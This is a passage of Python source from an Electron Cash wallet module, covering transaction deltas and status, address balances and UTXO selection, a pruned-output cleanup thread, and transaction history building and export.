if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status = _('Partially signed') + ' (%d/%d)' % (s, r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + bitcoin.COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
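# Balance sketch (hedged): the returned tuple is
# (confirmed_matured, unconfirmed, unmatured), all in satoshis, so the amount
# that is spendable right now is the confirmed component only.
#
#   c, u, x = wallet.get_addr_balance(addr)   # addr is an Address instance
#   print(f"confirmed={c} unconfirmed={u} unmatured={x}")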
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < bitcoin.COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
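# Coin-listing sketch built on get_utxos (hedged; the dict keys used below are
# exactly the ones populated by get_addr_utxo above):
#
#   coins = wallet.get_utxos(exclude_frozen=True, mature=True, exclude_slp=True)
#   total = sum(c['value'] for c in coins)
#   largest = max(coins, key=lambda c: c['value']) if coins else None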
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
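# Illustrative usage sketch (assumes a synchronized `wallet` instance):
# walking the (tx_hash, height, conf, timestamp, delta, balance) tuples
# returned by get_history().
#
#   for tx_hash, height, conf, timestamp, delta, balance in wallet.get_history():
#       print(tx_hash, height, delta, balance)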
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr is None: continue
input_addresses.append(addr.to_full_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_full_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
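# Illustrative usage sketch (assumes a synchronized `wallet` instance): one
# plausible way a GUI or RPC caller might drive export_history() with a
# progress callback.
#
#   def on_progress(frac):
#       print("export %3.0f%% done" % (frac * 100.0))
#
#   rows = wallet.export_history(fee_calc_timeout=10.0,
#                                download_inputs=False,
#                                progress_callback=on_progress)
#   for row in rows:
#       print(row['txid'], row['value'], row['fee'], row['balance'])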
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
"""Return a status value and status string.
Meaning of the status flag:
- 0: unconfirmed parent
- 1: status no longer used (it used to mean low fee for BTC)
- 2: unconfirmed
- 3: not verified (included in latest block)
- 4: verified by 1 block
- 5: verified by 2 blocks
- 6: verified by 3 blocks
- 7: verified by 4 blocks
- 8: verified by 5 blocks
- 9: verified by 6 blocks or more
"""
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
status = 3
status_str = 'unknown'
elif height < 0:
status = 0
status_str = 'Unconfirmed parent'
elif height == 0:
status = 2
status_str = 'Unconfirmed'
else:
status = 3
status_str = 'Not Verified'
else:
status = 3 + min(conf, 6)
status_str = format_time(timestamp) if timestamp else _("unknown")
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
